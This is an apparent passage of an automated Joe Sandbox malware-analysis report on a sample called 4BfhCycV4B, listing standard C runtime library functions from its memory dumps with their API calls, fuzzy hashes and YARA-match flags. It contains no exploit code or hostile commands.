                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 86531fabb68d3d6f13fdaa77f0d08b138506d19ae5e4cb7ce4dbf8c810f060c0
                                                                                                                                                                                                                                                                                        • Instruction ID: eb3437e7256d6e9500263c5b78cb76159e7e032ed684a14598ba9abdd6a69119
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 86531fabb68d3d6f13fdaa77f0d08b138506d19ae5e4cb7ce4dbf8c810f060c0
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 85112BB27081297FDB202F739D04AAF3A5CDF85734B51022EBC15D6241DEBC88818669
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0041F3DC Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 0041F123: _free.LIBCMT ref: 0041F14C
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0041F42A
                                                                                                                                                                                                                                                                                          • Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?), ref: 004162B0
                                                                                                                                                                                                                                                                                          • Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?,?), ref: 004162C2
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0041F435
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0041F440
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0041F494
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0041F49F
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0041F4AA
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0041F4B5
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 460351b857fe8a9d3303a957688c43c5d3be3019dce3ddf2a6ec4294657de2db
                                                                                                                                                                                                                                                                                        • Instruction ID: 6442e121d4515539895166ad143442a8d84c52f7901faf26133e6203624009ae
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 460351b857fe8a9d3303a957688c43c5d3be3019dce3ddf2a6ec4294657de2db
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 79113D71540B14FADA20BBF2DC07FCB77DCAF4470CF40482EBA9A66052DA7DB9894654
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0421F643 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 0421F38A: _free.LIBCMT ref: 0421F3B3
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0421F691
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216501: HeapFree.KERNEL32(00000000,00000000,?,0421F3B8,?,00000000,?,00000000,?,0421F65C,?,00000007,?,?,0421FA50,?), ref: 04216517
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216501: GetLastError.KERNEL32(?,?,0421F3B8,?,00000000,?,00000000,?,0421F65C,?,00000007,?,?,0421FA50,?,?), ref: 04216529
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0421F69C
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0421F6A7
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0421F6FB
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0421F706
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0421F711
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0421F71C
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 6f5f9210e66ecb300b20def578b7e57a4e9d6a14b2db5b2a678dd4c5c189928c
                                                                                                                                                                                                                                                                                        • Instruction ID: 8fa5eb2382597dbf84e54d3756061863251b6d7166074eaad32b9851216215f3
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6f5f9210e66ecb300b20def578b7e57a4e9d6a14b2db5b2a678dd4c5c189928c
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A3118472760744BBEF30B7B0CD45FCBB7DDAF28744F410924A6AA66070DA29F5054B51
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 00404189 Relevance: 10.6, APIs: 7, Instructions: 59COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __EH_prolog.LIBCMT ref: 0040418E
                                                                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0040419D
                                                                                                                                                                                                                                                                                        • int.LIBCPMT ref: 004041B4
                                                                                                                                                                                                                                                                                          • Part of subcall function 00401318: std::_Lockit::_Lockit.LIBCPMT ref: 00401329
                                                                                                                                                                                                                                                                                          • Part of subcall function 00401318: std::_Lockit::~_Lockit.LIBCPMT ref: 00401343
                                                                                                                                                                                                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 004041BD
                                                                                                                                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 004041EE
                                                                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00404204
                                                                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040422A
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1202896665-0
                                                                                                                                                                                                                                                                                        • Opcode ID: d30c74e071694a417726272b0ad9aec889f249fd02ec2d8ca2e4928fce66191a
                                                                                                                                                                                                                                                                                        • Instruction ID: 0d98e69d0512f29499375b1b223a36d4520ec3994eac90c636b6988e9ad91f04
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d30c74e071694a417726272b0ad9aec889f249fd02ec2d8ca2e4928fce66191a
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7311C472A041249BCB04EBA5DC46AEE7B74EF84358F10457FF911B72D1DB38AA01C7A9
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 004033EA Relevance: 10.6, APIs: 7, Instructions: 57COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __EH_prolog.LIBCMT ref: 004033EF
                                                                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 004033FE
                                                                                                                                                                                                                                                                                        • int.LIBCPMT ref: 00403415
                                                                                                                                                                                                                                                                                          • Part of subcall function 00401318: std::_Lockit::_Lockit.LIBCPMT ref: 00401329
                                                                                                                                                                                                                                                                                          • Part of subcall function 00401318: std::_Lockit::~_Lockit.LIBCPMT ref: 00401343
                                                                                                                                                                                                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 0040341E
                                                                                                                                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0040344F
                                                                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00403465
                                                                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040348B
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1202896665-0
                                                                                                                                                                                                                                                                                        • Opcode ID: d387dd142d687c27f104ba710c4403ca8660f45ee4346cae019e0b35d2893a61
                                                                                                                                                                                                                                                                                        • Instruction ID: b08fc69a2d58a520d61ed45628bf7838f6025f71e81aad9ede0327bacf9a49bc
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d387dd142d687c27f104ba710c4403ca8660f45ee4346cae019e0b35d2893a61
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8F11B2329002249BCB05EFA4C845AEE7B74EF84319F10457EF811772D1DB789A00CB99
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 004035F5 Relevance: 10.6, APIs: 7, Instructions: 57COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __EH_prolog.LIBCMT ref: 004035FA
                                                                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00403609
                                                                                                                                                                                                                                                                                        • int.LIBCPMT ref: 00403620
                                                                                                                                                                                                                                                                                          • Part of subcall function 00401318: std::_Lockit::_Lockit.LIBCPMT ref: 00401329
                                                                                                                                                                                                                                                                                          • Part of subcall function 00401318: std::_Lockit::~_Lockit.LIBCPMT ref: 00401343
                                                                                                                                                                                                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 00403629
                                                                                                                                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0040365A
                                                                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00403670
                                                                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00403696
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1202896665-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 4066e37fb53cc8e902d0eadf6d54435010486020b5249de0d597e5de03c7bd77
                                                                                                                                                                                                                                                                                        • Instruction ID: 35ba7fbacb3ba011adbce412d2c2d1e287e189574cae76d7885ddda8e317074f
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4066e37fb53cc8e902d0eadf6d54435010486020b5249de0d597e5de03c7bd77
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3F11C432A001289BCB14EFA5C845AEE7B74AF84319F10457FF811773D1DB389A04CB99
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 042169A6 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,04216BF7,00000001,00000001,?), ref: 04216A00
                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,04216BF7,00000001,00000001,?,?,?,?), ref: 04216A86
                                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 04216B80
                                                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 04216B8D
                                                                                                                                                                                                                                                                                          • Part of subcall function 04217CAC: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04217CDE
                                                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 04216B96
                                                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 04216BBB
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1414292761-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 5aa362d34f2587ad585337770af062121dfa53fa41768fff83d20bcf48d2f1bc
                                                                                                                                                                                                                                                                                        • Instruction ID: 94a82591ab2ac3dd5e411d8fd48f5d9ba6b940b73e2eae206f5b51206d7a0b43
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5aa362d34f2587ad585337770af062121dfa53fa41768fff83d20bcf48d2f1bc
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8F51D2B2720216AFEB254F64CC40FAF77EAEBA0754B154229ED05E71A0EB74FD40C690
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 00411A77 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: __cftoe
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 4189289331-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 24b6c81d24c1011e6b07ecd5cf8c64815793f5a75054e37069f5cd6800f080c6
                                                                                                                                                                                                                                                                                        • Instruction ID: 718bfb1be64fddbb13d287cf5bb67825c1c0e481ba6d94f2ea4f00e94f797b17
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 24b6c81d24c1011e6b07ecd5cf8c64815793f5a75054e37069f5cd6800f080c6
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5851FB32504205ABDF249B598C41EEF77A9AF49364F10421FF915962A1FB3DE9C0C66C
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 04211CDE Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: __cftoe
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 4189289331-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 2ddc8343f9251e146c752777cf7602817e468c0d1f081b9786246e2890976293
                                                                                                                                                                                                                                                                                        • Instruction ID: a5137251f92ea3b8c6db9932a62e42dd5095706bf32c3790176834f165276a9d
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2ddc8343f9251e146c752777cf7602817e468c0d1f081b9786246e2890976293
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D4511A32B20206ABEB249FA88C80FBE77E89F6D364F100119EA15D61F1DF31F550C6A1
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0040C9B5 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,0040C9AC,0040A25B), ref: 0040C9C3
                                                                                                                                                                                                                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040C9D1
                                                                                                                                                                                                                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040C9EA
                                                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000,?,0040C9AC,0040A25B), ref: 0040CA3C
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 2017d0c311a5918e7d0e6f8584ac7bf8dd2dc1fa6ddebb020deab9cf5e921c22
                                                                                                                                                                                                                                                                                        • Instruction ID: 4d2dab335d40ef71c1f126db0958835d547db160ba3e5df8986dc94b5f1501a5
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2017d0c311a5918e7d0e6f8584ac7bf8dd2dc1fa6ddebb020deab9cf5e921c22
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5001C072609619AEE63857B5BCC5B2B3665DB01378720033FF220B02F1EF694C06558C
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0420CC1C Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,0420CC13,0420A4C2), ref: 0420CC2A
                                                                                                                                                                                                                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0420CC38
                                                                                                                                                                                                                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0420CC51
                                                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000,?,0420CC13,0420A4C2), ref: 0420CCA3
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 0582111726bc4582c636df92e8fe045c6ff17bb16724062b7f54ac71f9743851
                                                                                                                                                                                                                                                                                        • Instruction ID: da0a9d98b78b3c57402a5198e248534a2c890fbbd2eb1ad69464b0000a5e6176
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0582111726bc4582c636df92e8fe045c6ff17bb16724062b7f54ac71f9743851
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BF01DD7233A3265DA71C16B6FD48B5B37D4DF016787208339E224920F1FF5168019184
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 00416D19 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3160817290-0
                                                                                                                                                                                                                                                                                        • Opcode ID: def3f5077243ae124692277122a2a9679e38c413d1265678c652793f5ad9d567
                                                                                                                                                                                                                                                                                        • Instruction ID: ed1cfbe94671cc1e241a5e305b234748cf7dab698c9013e935629a888f8688e1
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: def3f5077243ae124692277122a2a9679e38c413d1265678c652793f5ad9d567
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1CF0A431784B1066C6227B36BC0AFDF26299FC1765B27062FF518A2291EF2CD882815D
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 04216F80 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3160817290-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 998e373a8b585b2683437369c8faaac4270011fdab842cf86591235bf0544559
                                                                                                                                                                                                                                                                                        • Instruction ID: c439df6f543fa247bc858b1f4ce558c904fc1fb521915099534190a6966fb4ac
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 998e373a8b585b2683437369c8faaac4270011fdab842cf86591235bf0544559
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B2F0F4367686122BE22237797C08F2F35D59BE1765F254164F516E22B0EEA1A8024164
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 00417253 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,-@,00000000,00000000,?,004171FA,-@,00000000,00000000,00000000,?,004174B2,00000006,FlsSetValue), ref: 00417285
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,004171FA,-@,00000000,00000000,00000000,?,004174B2,00000006,FlsSetValue,0042E2F0,FlsSetValue,00000000,00000364,?,00416DEB), ref: 00417291
                                                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004171FA,-@,00000000,00000000,00000000,?,004174B2,00000006,FlsSetValue,0042E2F0,FlsSetValue,00000000), ref: 0041729F
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                                        • String ID: -@
                                                                                                                                                                                                                                                                                        • API String ID: 3177248105-2564449678
                                                                                                                                                                                                                                                                                        • Opcode ID: cfd02a50bf476b7c4f1bcf1e7d068622a64cc9e2d77f2ff3f9ca9aa917f168a2
                                                                                                                                                                                                                                                                                        • Instruction ID: 8997a9a2b537593604dca6541f5acb5d3abab1905c8fb23eed40c845f27096e8
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cfd02a50bf476b7c4f1bcf1e7d068622a64cc9e2d77f2ff3f9ca9aa917f168a2
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ED01473634A2239BC7314B68AC44A9B3BA8BF117607114675F90AE3240DB34D843C6EC
